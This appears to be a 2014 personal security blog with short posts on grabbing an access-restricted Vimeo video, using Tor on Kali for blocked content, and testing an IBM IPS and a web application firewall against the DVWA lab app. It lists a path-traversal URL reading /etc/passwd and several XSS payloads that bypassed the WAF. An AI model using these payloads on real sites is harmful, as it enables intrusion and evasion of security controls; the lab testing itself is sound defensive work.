Thursday, October 2, 2014

Vimeo-no-access-to-full-access

I came across a situation where I have a valid video link of vimeo but vimeo will not allow that to view online !

Rest explained below in pictures ..

First when I tried to access it on browser it did not worked !

Then I pasted the link in http://www.videograbber.net/free-vimeo-downloader

I was easily able to download the video :D


**Contents hidden due to privacy issues ...

How do I got the links ?

It was from a web site I just saved the source of the site and ran the following command from linux to get the vimeo links

#grep vimeo vimeo.txt  | awk -F"src=" '{print $2}' | awk -F "\" frame" '{print $1}' | awk -F "\"" '{print $2}'

Tuesday, September 30, 2014

Kali-Tor-Blocked-Content-download

Just a snap about blocked content [by Organization/ISP/Govt./Country/etc.] download on Kali using TOR network.


TOR
torsocks
Blocked Contents
Kali
Tails Linux

Monday, September 29, 2014

IBM Security Network Protection

IBM Security Network Protection (IPS/IDS)

Downloaded the following from IBM site.

1. VMware image of the IBM Security Network Protection (XGS) Virtual Appliance for Demo.
2.  30 day license for all features, functionality and updates.
3. Demo Setup Guide for ISNP (XGS) Virtual Appliance.

VM settings for  IBM Security Network Protection


Custom Interface /dev/vmnet4 is crucial in this configuration as it works in bridge sniffing mode.


 VM settings for DVWA (live CD)

DVWA is accessing through IPS/IDS bridge.

Sample application access monitoring and blocked URL.



 Event Log entry created 

URLs accessed for file access IPS entry :- http://192.168.116.133/vulnerabilities/fi/?page=../../../../../../../../../../etc/passwd

Wednesday, September 24, 2014

Demostrating-WebApplicationFirewall

The WAF was able to block almost all attacks against the Damn Vulnerable Web Application.
The attack was generated by Burpsuite professional, Acunetix and manual from Burp.

Alerts created on WAF during the web attack : -

SQL Injection alert details

XSS alert and blocked

Example blocking of attacks
video

Bypassing of WAF

I am trying to bypass WAF (will be listed below successful bypasses)

The following payload was able to bypass WAF. The web application is DVWA.

http://192.168.77.200/vulnerabilities/xss_r/?name=%27%3E%3Cmarquee/onstart=confirm%282%29%3E/

http://192.168.77.200/vulnerabilities/xss_r/?name='><marquee/onstart=confirm(1)>

http://192.168.77.200/vulnerabilities/xss_r/?name='><svg/onload=prompt(1);>